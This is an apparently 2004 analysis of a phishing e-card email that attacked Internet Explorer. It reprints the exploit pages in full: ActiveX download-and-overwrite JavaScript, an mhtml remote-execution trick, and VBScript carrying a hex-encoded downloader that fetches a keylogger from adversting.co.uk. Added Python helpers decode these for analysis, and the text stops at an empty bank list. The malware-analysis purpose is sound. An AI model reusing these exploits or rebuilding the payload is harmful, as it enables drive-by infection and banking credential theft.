E-card Hijack Spam
Introduction
I got an email on February 15th, 2004 telling me I had received an e-card from someone at 123greetings.com. The email looked a little bit suspicious, since the sender of the e-card (kissmytearsx@comcast.net) was someone I didn't recognize, and the URL to view the card showed only the root domain of 123greetings.com. However, being the lonely geek I am, I clicked on the link hoping that I had a secret admirer who had emailed me a card for Valentine's Day...
The page opened in my browser, but nothing happened. Lucky for me, I wasn't using Internet Explorer so I was saved. A closer look at the email and URL revealed an attempt to use IE exploits to hijack the computer and install a trojan that steals sensitive information including passwords and bank account numbers.
It has been pointed out to me that the email says that you sent a card, not received one. I should have noticed this and realized I hadn't sent any cards to anyone.
Feb 16th: This article was Slashdotted
Feb 19th: This article has shown up all over the internet, on sites such as technologyreview.com and spamisbad.com.
The E-mail
There are several things to notice about the following email. Starting at the beginning, read the Received headers from the bottom up: the message was handed to mail.zoneedit.com by rk160.neoplus.adsl.tpnet.pl [80.50.83.160], a DSL line in Poland that introduced itself as compuserve.com in its HELO (SpamAssassin's RCVD_FAKE_HELO_DOTCOM test noticed the same thing). It definitely did not come from the 123greetings.com servers. The From, Reply-To, Sender and Return-Path headers are obviously fake; nothing in SMTP verifies any of them, so they say whatever the sender wants.
A comment in the HTML content of the email shows that it was saved from http://d40921.u24.whp-server.com/card.htm, where a copy of what is presumably the original email still exists. That comment is the marker Internet Explorer writes when a page is saved with File > Save As; the title tag is set to "Untitled Document", and a META tag names the generator as MSHTML 6.00.2737.800, i.e. the Internet Explorer 6 engine. Most likely the spammer saved a real 123greetings notification from IE and edited it.
The URL view-source:http://210.192.42.34/img/ [warning, don't click unless you know what you're doing] appears throughout the rest of the email. Every link still displays a 123greetings.com address (or the misspelt ww.123greetings.com) as its visible text, but the href of each has been changed to point to this bare IP address, and a 0x0 iframe at the end of the email also opens it, so in a mail client that renders HTML with iframes enabled no click is needed at all.
From ecard@123greetings.com Sun Feb 15 11:13:52 2004
Return-Path: <ecard@123greetings.com>
Delivered-To: MYEMAIL
Received: from localhost (localhost [127.0.0.1]) by mail.tjhsst.edu
(Postfix) with ESMTP id 99462A2C1A for <MYEMAIL>; Sun, 15 Feb
2004 11:13:52 -0500 (EST)
Received: from mail.tjhsst.edu ([127.0.0.1]) by localhost (macaroni
[127.0.0.1]) (amavisd-new, port 20025) with ESMTP id 01846-06 for
<MYEMAIL>; Sun, 15 Feb 2004 11:13:52 -0500 (EST)
Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160]) by
mail.tjhsst.edu (Postfix) with ESMTP id AF227A2C19 for <MYEMAIL>;
Sun, 15 Feb 2004 11:13:51 -0500 (EST)
Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160])
by mail.zoneedit.com (Postfix) with SMTP id C84213EBB8 for
<MYEMAIL>; Sun, 15 Feb 2004 11:13:48 -0500 (EST)
Date: Sun, 15 Feb 2004 16:16:50 +0000
From: Ecard <ecard@123greetings.com>
Subject: You have received E-card at 123Greetings.com
To: ME <MYEMAIL>
Message-ID: <2BK7DCI33AK80CAE@123greetings.com>
Reply-To: Ecard <ecard@123greetings.com>
Sender: Ecard <ecard@123greetings.com>
MIME-Version: 1.0
Content-Type: text/html; charset=Windows-1251
X-Virus-Scanned: by amavisd-new-20030616-p5 (Debian) at macaroni
X-Spam-Status: No, hits=4.3 tagged_above=2.0 required=6.3 tests=HTML_30_40,
HTML_COMMENT_SAVED_URL, HTML_MESSAGE, HTML_RELAYING_FRAME,
HTML_TITLE_UNTITLED, MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,
RCVD_FAKE_HELO_DOTCOM
X-Spam-Level: ****
Content-Transfer-Encoding: 8bit
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0041)http://d40921.u24.whp-server.com/card.htm -->
<HTML><HEAD><TITLE>Untitled Document</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2737.800" name=GENERATOR></HEAD>
<BODY bgColor=#ffffff><PRE>Dear Admirer,
Your e-card has been sent to My... at kissmytearsx@comcast.net
123Greetings.com is all about touching lives, bridging distances, healing rifts
and building bonds. We have a gallery of e-cards for almost every occasion of
life. Express yourself to your friends and family by sending Free e-cards from
our site with your choice of colors, words and music.
Your e-card will be available with us for the next 30 days. If you wish to keep
the e-card longer, you may save it on your computer or take a print.
To view a copy of the e-card you have sent, choose from any of the following
options:
--------
OPTION 1
--------
Click on the following Internet address or
copy & paste it into your browser's address box.
<A href="http://210.192.42.34/img/">http://www.123greetings.com/</A>
--------
OPTION 2
--------
Copy & paste the e-card number in the "View Your Card" box at
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>
Your e-card number is
7CU20121085738151
If you need help in viewing your e-card or any other assistance,
please visit our Help / FAQ section located at
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/help/</A>
If you need further help, feel free to write to us at
<A href="mailto:%20support@123greetings.com">mailto:%20support@123greetings.com</A>
Best wishes,
Postmaster,
123Greetings.com
*If you would like to send someone an e-card, you can do so at
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>
<IFRAME SRC="http://210.192.42.34/img/" height="0" width="0">gf</iframe>
</PRE></BODY></HTML>
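The three things to check above (where the message really entered the mail system, whether the link text matches the href, and the invisible iframe) are easy to automate. The following is an added Python example written for this page, not code from the original article; the message it parses is a constructed, trimmed copy of the headers and links shown above with the recipient replaced by victim@example.org and the header folding restored, and base_domain() is a deliberate simplification (last two labels, no public suffix list).

```python
"""Added example for this write-up (not code from the original page): the
three header and body checks made above, automated with the standard library."""
import email
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: a trimmed copy of the message above, with the recipient
# replaced by victim@example.org and RFC 5322 header folding restored.
RAW_EMAIL = """\
Return-Path: <ecard@123greetings.com>
Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160]) by
 mail.tjhsst.edu (Postfix) with ESMTP id AF227A2C19 for <victim@example.org>;
 Sun, 15 Feb 2004 11:13:51 -0500 (EST)
Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160])
 by mail.zoneedit.com (Postfix) with SMTP id C84213EBB8 for
 <victim@example.org>; Sun, 15 Feb 2004 11:13:48 -0500 (EST)
From: Ecard <ecard@123greetings.com>
Reply-To: Ecard <ecard@123greetings.com>
Sender: Ecard <ecard@123greetings.com>
Subject: You have received E-card at 123Greetings.com
To: victim@example.org
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit

<HTML><BODY><PRE>Click on the following Internet address:
<A href="http://210.192.42.34/img/">http://www.123greetings.com/</A>
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/help/</A>
<A href="mailto:%20support@123greetings.com">mailto:%20support@123greetings.com</A>
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>
<IFRAME SRC="http://210.192.42.34/img/" height="0" width="0">gf</iframe>
</PRE></BODY></HTML>
"""

# "from <helo> (<reverse dns> [<ip>])" as Postfix writes it
HOP_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([\d.]+)\]\)")


def base_domain(host):
    """Last two labels of a host name.  A simplification for this example;
    a real check would consult a public-suffix list."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def originating_hop(msg):
    """Each relay prepends a Received header, so the last one is the hop
    closest to the sender.  Returns (helo_name, reverse_dns, ip) or None."""
    received = msg.get_all("Received") or []
    if not received:
        return None
    match = HOP_RE.search(" ".join(received[-1].split()))
    return match.groups() if match else None


def sender_mismatch(msg):
    """True when neither the HELO name nor the reverse DNS of the originating
    hop belongs to the domain the From header claims."""
    hop = originating_hop(msg)
    if hop is None:
        return True  # an origin we cannot parse is a red flag in itself
    from_dom = base_domain(parseaddr(msg.get("From", ""))[1].rsplit("@", 1)[-1])
    helo, rdns, _ip = hop
    return from_dom not in (base_domain(helo), base_domain(rdns))


class LinkAudit(HTMLParser):
    """Collect anchors whose visible text names a different host than their
    href, and iframes sized 0x0 (fetched with no click at all)."""

    def __init__(self):
        super().__init__()
        self.mismatches = []      # (host shown to the user, host actually linked)
        self.hidden_iframes = []  # src of each invisible iframe
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            self._href, self._text = a.get("href", ""), []
        elif tag == "iframe" and a.get("width") == "0" and a.get("height") == "0":
            self.hidden_iframes.append(a.get("src", ""))

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            shown, target = urlsplit("".join(self._text).strip()), urlsplit(self._href)
            if shown.scheme in ("http", "https") and shown.hostname != target.hostname:
                self.mismatches.append((shown.hostname, target.hostname))
            self._href = None


def audit(raw=RAW_EMAIL):
    """Run all three checks on one raw message and return the findings."""
    msg = email.message_from_string(raw)
    links = LinkAudit()
    links.feed(msg.get_payload())
    return {"origin": originating_hop(msg),
            "sender_mismatch": sender_mismatch(msg),
            "link_mismatches": links.mismatches,
            "hidden_iframes": links.hidden_iframes}


if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```

On the sample above this reports the compuserve.com HELO from the tpnet.pl address, a From domain that matches neither, four links whose text says 123greetings.com while the href says 210.192.42.34, and one 0x0 iframe pointing at the same address. The mailto: link is ignored on purpose: only anchors whose visible text is itself an http(s) URL can lie about their host.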
The Offending URL
The URL, whose HTML source is reproduced below, does some really nasty stuff. Using three 0x0 iframes, an object tag and some JavaScript, it loads several other files from the same server, each explained later on:
- view-source:http://210.192.42.34/img/spy.htm
- view-source:http://210.192.42.34/img/start.html
- view-source:http://210.192.42.34/img/ro.htm
- view-source:http://210.192.42.34/img/1.php
In addition to opening other URLs, the page also does its own share of nasty things. A hidden textarea holds JavaScript that creates two ActiveX objects: Microsoft.XMLHTTP fetches a.exe from adversting.co.uk, and ADODB.Stream writes the response body over C:\Program Files\Windows Media Player\wmplayer.exe. It then sets location.href to mms://, a protocol handled by Windows Media Player, so the freshly replaced wmplayer.exe is launched. The textarea's contents are not run directly. After a 5 second timeout, preparecode() trims each line, escapes it for a single-quoted JavaScript string and percent-encodes the slashes, and doit() opens the result as a file:javascript:eval('...') URL in the _media target, Internet Explorer's Media Bar. Running the code from a file: URL in that pane is the point of the detour: it gets the script out of the Internet zone, where ADODB.Stream would not be allowed to write to disk. Before the 5 seconds are up, a harmless-looking error.jsp is opened in the Media Bar to throw off the user.
<iframe src="spy.htm" height="0" width="0">f</iframe>
<iframe src="start.html" height="0" width="0">f</iframe>
<iframe src="ro.htm" height="0" width="0">f</iframe>
<object data="1.php"></object>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
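To see exactly what IE ends up evaluating, the staging can be reproduced without touching ActiveX. The block below is an added Python example for this page, not code from the exploit or from the original write-up: it ports preparecode() to show the file:javascript:eval('...') URL the page builds, then does the reverse, unwrapping such a URL back into the script so an analyst can read it, and pulls out the ProgIDs, download URL, overwrite target and redirect. It assumes, as the payload itself does for its http:// and mms:// strings, that the browser percent-decodes the URL before evaluating it.

```python
"""Added example for this write-up (not code from the exploit page or the
original article): reproduce the staging of the hidden textarea and unwrap
the resulting URL back into the script an analyst wants to read."""
import re

# Constructed copy of the textarea contents shown above (raw string, so the
# doubled backslashes are exactly the characters the page contains).
TEXTAREA_CODE = r"""
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
"""

PREFIX, SUFFIX = "file:javascript:eval('", "')"


def preparecode(code):
    """Python port of the page's preparecode(): trim each line, escape it for
    a single-quoted JS literal, percent-encode '/', append a literal \\r\\n.
    The original escapes quotes before backslashes, so a quote would come out
    double-escaped and break the eval; the payload happens to contain none."""
    out = []
    for line in re.split(r"\r?\n", code):
        line = line.strip().replace("'", "\\'").replace("\\", "\\\\").replace("/", "%2f")
        if line:
            out.append(line + "\\r\\n")
    return "".join(out)


def staging_url(code):
    """The URL doit() opens in the _media target."""
    return PREFIX + preparecode(code) + SUFFIX


def recover_staged_code(url):
    """Inverse of staging_url(): strip the eval wrapper, undo the '/' encoding
    (assumption: IE percent-decodes the URL before evaluating it, which the
    payload's http:// and mms:// strings rely on), then undo the JS string
    escapes left to right, as a JS parser would."""
    if not (url.startswith(PREFIX) and url.endswith(SUFFIX)):
        raise ValueError("not a file:javascript:eval wrapper")
    body = re.sub("%2f", "/", url[len(PREFIX):-len(SUFFIX)], flags=re.IGNORECASE)
    escapes = {"r": "\r", "n": "\n"}
    return re.sub(r"\\(.)", lambda m: escapes.get(m.group(1), m.group(1)), body)


def extract_indicators(js):
    """Pull the ProgIDs, download URL, overwritten file and redirect target
    out of the recovered script.  SaveToFile's argument is a JS string
    literal, so its escapes are decoded to give the real path."""
    saves = [p.encode("ascii").decode("unicode_escape")
             for p in re.findall(r'SaveToFile\("([^"]+)"', js)]
    return {"progids": re.findall(r'ActiveXObject\("([^"]+)"\)', js),
            "fetches": re.findall(r'\.Open\("GET",\s*"([^"]+)"', js),
            "saves_to": saves,
            "redirects": re.findall(r'location\.href\s*=\s*"([^"]+)"', js)}


if __name__ == "__main__":
    url = staging_url(TEXTAREA_CODE)
    print(url)
    print(extract_indicators(recover_staged_code(url)))
```

Running it prints a URL with no slashes at all (every one is %2f) and with the path backslashes doubled a second time, then the indicators recovered from it: Microsoft.XMLHTTP and ADODB.Stream, the a.exe URL, the wmplayer.exe path and the mms:// redirect. The same recover_staged_code() works on any file:javascript:eval('...') URL pulled from a proxy log, which is the point of keeping it separate from the port.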
spy.htm - I wonder what this does?
Despite its malicious-sounding name, all this file contains is the standard tracking code supplied by spylog.com, a Russian web-statistics service: it reports the visitor's screen size, colour depth, referrer and page URL to the counter with id 532708. I couldn't figure out how to view the stats that are being compiled by SpyLOG, but the author no doubt has access to them and can use them to count how many computers he has hijacked.
<!-- SpyLOG f:0211 -->
<script language="javascript"><!--
Mu="u5327.08.spylog.com";Md=document;Mnv=navigator;Mp=0;
Md.cookie="b=b";Mc=0;if(Md.cookie)Mc=1;Mrn=Math.random();
Mn=(Mnv.appName.substring(0,2)=="Mi")?0:1;Mt=(new Date()).getTimezoneOffset();
Mz="p="+Mp+"&rn="+Mrn+"&c="+Mc+"&t="+Mt;
if(self!=top){Mfr=1;}else{Mfr=0;}Msl="1.0";
//--></script><script language="javascript1.1"><!--
Mpl="";Msl="1.1";Mj = (Mnv.javaEnabled()?"Y":"N");Mz+='&j='+Mj;
//--></script><script language="javascript1.2"><!--
Msl="1.2";Ms=screen;Mpx=(Mn==0)?Ms.colorDepth:Ms.pixelDepth;
Mz+="&wh="+Ms.width+'x'+Ms.height+"&px="+Mpx;
//--></script><script language="javascript1.3"><!--
Msl="1.3";//--></script><script language="javascript"><!--
My="";My+="<a href='http://"+Mu+"/cnt?cid=532708&f=3&p="+Mp+"&rn="+Mrn+"' target='_blank'>";
My+="<img src='http://"+Mu+"/cnt?cid=532708&"+Mz+"&sl="+Msl+
"&r="+escape(Md.referrer)+"&fr="+Mfr+"&pg="+escape(window.location.href);
My+="' border=0 width=88 height=31 alt='SpyLOG'>";
My+="</a>";Md.write(My);//--></script><noscript>
<a href="http://u5327.08.spylog.com/cnt?cid=532708&f=3&p=0" target="_blank">
<img src="http://u5327.08.spylog.com/cnt?cid=532708&p=0" alt='SpyLOG'
border='0' width=88 height=31 >
</a></noscript>
<!-- SpyLOG -->
start.html - The file that ran away
Presumably this file existed at one point and did something (maybe changed the browser's start page?), but by the time I looked it returned a 404 from an Apache/1.3.12 server calling itself panda.coventive.com.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /img/start.html was not found on this server.<P> <HR> <ADDRESS>Apache/1.3.12 Server at panda.coventive.com Port 80</ADDRESS> </BODY></HTML>
ro.htm - Remote execution
The author tries yet another IE exploit to run a.exe remotely. A pop-up window is written an OBJECT tag whose CODEBASE is an mhtml: URL naming a local .MHT file that does not exist, followed by '!' and the real URL of a.exe; when the MHT cannot be opened, IE fetches the URL after the '!' instead and treats it as the object's code, and the two execCommand("Refresh") calls are there to make that happen reliably. The HijackClickV2-MyPage text in the body looks like leftover text from a published proof-of-concept.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script>
WaitForDocumentCached_TIME=100;
function LaunchRemoteExe_Step2()
{
//One more fresh action is present for more stable performance
for(i=1;i<=2;i++)
w.document.execCommand("Refresh");
}
function LaunchRemoteExe(ExeUrl)
{
w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}
LaunchRemoteExe("http://adversting.co.uk/a.exe")
</script>
</head>
<body>
<font size="6"><font size="2"><big><big><big>
<big>HijackClickV2-MyPage</big></big>
</big></big><b><i><br>
<br>
</body>
</html>
1.php - Last Attempt
1.php tries one last method to run a.exe. The file contains VBScript, but is probably served by PHP so that it can send an application/hta Content-Type header: IE treats such a response as an HTML Application and hands it to mshta.exe, which runs the script with the user's full privileges instead of inside the browser's security zone. The encoded VBScript (VBScript.Encode) has been removed (view it at view-source:http://210.192.42.34/img/1.php) and replaced with the decoded version of the code.
The VBScript carries the binary contents of a small executable as hex strings (szZeroLine is 48 zero bytes, reused for the padding). It converts them two digits at a time with Int("&H" & ...) and Chr(), writes the result to c:\x.exe through Scripting.FileSystemObject, then launches it with WScript.Shell, passing the URL of a.exe as the only argument.
<html>
<script language=vbs>
szURL = "http://adversting.co.uk/a.exe"
</script>
<script language="VBScript.Encode">
<%
szZeroLine =
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary &
"4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000"
szBinary = szBinary &
"000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F"
szBinary = szBinary &
"742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005D87017219E66F2119E66F2119E66F21"
szBinary = szBinary &
"97F97C2112E66F21E5C67D2118E66F215269636819E66F2100000000000000000000000000000000504500004C010300"
szBinary = szBinary &
"AB93493F0000000000000000E0000F010B01050C00020000000400000000000000100000001000000020000000004000"
szBinary = szBinary &
"001000000002000004000000000000000400000000000000004000000004000000000000020000000000100000100000"
szBinary = szBinary &
"000010000010000000000000100000000000000000000000182000002800000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine
szBinary = szBinary &
"2E7465787400000064000000001000000002000000040000000000000000000000000000200000602E72646174610000"
szBinary = szBinary &
"BE000000002000000002000000060000000000000000000000000000400000402E646174610000002700000000300000"
szBinary = szBinary &
"0002000000080000000000000000000000000000400000C0000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary &
"00000000000000000000000000000000E8470000006683C00A8D08516800304000E842000000680B30400050E8310000"
szBinary = szBinary &
"00596A006A008D1D1E30400053516A00FFD06A01681E304000E8200000006A00E801000000CCFF2510204000FF250020"
szBinary = szBinary &
"4000FF2504204000FF2508204000FF250C20400000000000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary &
"66200000782000008A2000009A2000005820000000000000402000000000000000000000A42000000020000000000000"
szBinary = szBinary &
"0000000000000000000000000000000066200000782000008A2000009A20000058200000000000008000457869745072"
szBinary = szBinary &
"6F6365737300C800476574436F6D6D616E644C696E6541001F0147657450726F63416464726573730000A4014C6F6164"
szBinary = szBinary &
"4C696272617279410000940257696E45786563006B65726E656C33322E646C6C00007573657233322E646C6C00000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
szZeroLine & szZeroLine
szBinary = szBinary &
"000000000000000000000000000000000000000000000000000000000000000075726C6D6F6E2E646C6C0055524C446F"
szBinary = szBinary &
"776E6C6F6164546F46696C654100633A5C792E6578650000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "00000000000000000000000000000000"
szApplication = "c:\x.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
intLength = len(szBinary)
intPosition = 1
while intPosition < intLength
char = Int("&H" & Mid(szBinary, intPosition, 2))
hFile.Write(Chr(char))
intPosition = intPosition+2
wend
hFile.Close
Set hShell=CreateObject("WScript.Shell")
hShell.run(szApplication+" "+szURL)
%>
</script>
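The decoding James Sneeringer describes below (converting the VBScript into a script that emits the bytes) is worth having in a form that also checks the result, so here is an added Python version, written for this page and not part of the original article or of 1.php. It takes the hex lines exactly as they appear in the decoded 1.php above, rebuilds the file in memory, walks the DOS and PE headers and pulls the printable strings the way the strings command would. One thing a plain strings run does not show: the headers place the section table at e_lfanew + 24 + SizeOfOptionalHeader = 432, but the .text/.rdata/.data headers actually sit at 384, one szZeroLine earlier, and the section pointers describe a file longer than the one written. At least as transcribed here, x.exe is not a well-formed PE, which fits Robert Myers's report below that it does not run.

```python
"""Added example for this page (not the author's or 1.php's code): rebuild x.exe
from the hex constants in the decoded 1.php above and check its PE headers."""
import re
import struct

ZERO_LINE = "00" * 48  # the VBScript's szZeroLine: 48 zero bytes

# The hex lines of 1.php, copied verbatim and in order.  An integer n stands
# for n copies of szZeroLine, exactly as the VBScript concatenates them.
X_EXE_PARTS = [
    "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000",
    "000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F",
    "742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005D87017219E66F2119E66F2119E66F21",
    "97F97C2112E66F21E5C67D2118E66F215269636819E66F2100000000000000000000000000000000504500004C010300",
    "AB93493F0000000000000000E0000F010B01050C00020000000400000000000000100000001000000020000000004000",
    "001000000002000004000000000000000400000000000000004000000004000000000000020000000000100000100000",
    "000010000010000000000000100000000000000000000000182000002800000000000000000000000000000000000000",
    1,
    "2E7465787400000064000000001000000002000000040000000000000000000000000000200000602E72646174610000",
    "BE000000002000000002000000060000000000000000000000000000400000402E646174610000002700000000300000",
    "0002000000080000000000000000000000000000400000C0000000000000000000000000000000000000000000000000",
    9,
    "00000000000000000000000000000000E8470000006683C00A8D08516800304000E842000000680B30400050E8310000",
    "00596A006A008D1D1E30400053516A00FFD06A01681E304000E8200000006A00E801000000CCFF2510204000FF250020",
    "4000FF2504204000FF2508204000FF250C20400000000000000000000000000000000000000000000000000000000000",
    8,
    "66200000782000008A2000009A2000005820000000000000402000000000000000000000A42000000020000000000000",
    "0000000000000000000000000000000066200000782000008A2000009A20000058200000000000008000457869745072",
    "6F6365737300C800476574436F6D6D616E644C696E6541001F0147657450726F63416464726573730000A4014C6F6164",
    "4C696272617279410000940257696E45786563006B65726E656C33322E646C6C00007573657233322E646C6C00000000",
    6,
    "000000000000000000000000000000000000000000000000000000000000000075726C6D6F6E2E646C6C0055524C446F",
    "776E6C6F6164546F46696C654100633A5C792E6578650000000000000000000000000000000000000000000000000000",
    9,
    "00000000000000000000000000000000",
]


def rebuild_x_exe(parts=X_EXE_PARTS):
    """Concatenate the lines the way the VBScript loop does and decode to bytes."""
    return bytes.fromhex("".join(ZERO_LINE * p if isinstance(p, int) else p for p in parts))


def parse_pe_headers(data):
    """DOS header -> PE signature -> COFF file header -> a few optional-header fields."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24  # 4-byte signature + 20-byte file header
    return {"e_lfanew": e_lfanew, "machine": machine, "nsections": nsections,
            "entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "expected_section_table": opt + opt_size}


def parse_section_table(data, offset, nsections):
    """Read nsections 40-byte IMAGE_SECTION_HEADERs starting at offset."""
    rows = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, offset + 40 * i)
        rows.append({"name": name.rstrip(b"\0").decode("ascii"), "vsize": vsize,
                     "va": va, "rawsize": rawsize, "rawptr": rawptr})
    return rows


def ascii_strings(data, minlen=6):
    """What the strings command prints: runs of printable ASCII at least minlen long."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, data)]


def analyse(data):
    """Where the headers say the section table is vs. where the section headers
    really sit, the file size the headers imply vs. the real one, and the strings."""
    hdr = parse_pe_headers(data)
    actual = data.find(b".text\0\0\0")
    sections = parse_section_table(data, actual, hdr["nsections"])
    last = max(sections, key=lambda s: s["rawptr"])
    return {**hdr, "actual_section_table": actual,
            "table_shift": hdr["expected_section_table"] - actual,
            "sections": sections,
            "size_from_headers": last["rawptr"] + last["rawsize"],
            "actual_size": len(data), "strings": ascii_strings(data)}


if __name__ == "__main__":
    for key, value in analyse(rebuild_x_exe()).items():
        print(f"{key}: {value}")
```

The strings list ends with kernel32.dll, urlmon.dll, URLDownloadToFileA and c:\y.exe, which is the whole program: the 0x1000 entry point calls GetCommandLineA, skips the first ten characters ("c:\x.exe "), loads urlmon.dll, resolves URLDownloadToFileA, fetches the URL to c:\y.exe and hands it to WinExec, exactly as James Sneeringer describes below. Nothing here writes the file to disk; keep it that way.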
x.exe - The Accomplice
I don't have a Windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free, and be sure to email me anything you find so that I can update this page.
Feb 16th, 12PM: According to Robert Myers, x.exe isn't a valid Windows executable, and doesn't run properly on either XP or 98. Looking at the raw binary, the intent is to simply download the URL given on the command line and execute it. It should download a.exe, call it c:\y.exe and run it.
Feb 16th, 3PM: Slashdot reader James Sneeringer emailed me the following update:
As you know, 1.php decodes into x.exe. It's quite small, only 2512 bytes. When run, it evidently attempts to download whatever URL is passed to it, (using URLDownloadToFileA()) and saves it to c:\y.exe, then tries to run it (using WinExec()). So x.exe downloads a.exe as y.exe and runs it. I obtained a.exe from the URL in 1.php, http://adversting.co.uk/a.exe. The a.exe file appears to be a keylogger, as the string "key.log" is contained in it. It contains calls to RegCreateKeyExA(), MessageBoxA(), and InternetOpenA(), so it probably does the usual trojan/worm thing... ensures it starts up on reboot, prints misleading error messages, phones home, etc. I have not run any of these programs. I have only analyzed them on a Linux system using the strings command. I did copy a.exe to a Windows system running Norton AntiVirus, but it didn't flag it as any known Trojan or SpyWare. I obtained x.exe by converting the VBScript code to perl. I hope this helps.
a.exe - Final Destination
Feb 16th, 3:30PM: I've gotten several emails providing information about a.exe (md5sum e8262377158e2b0b3932292f49fd23a6).
Robert Myers reports that the exe has references to spy.dll and keylg.dll
John reports:
I analyzed the a.exe and found disturbing info: it is after banks, as described in an unpacked version (the file is compacted). Bank list is as follows:
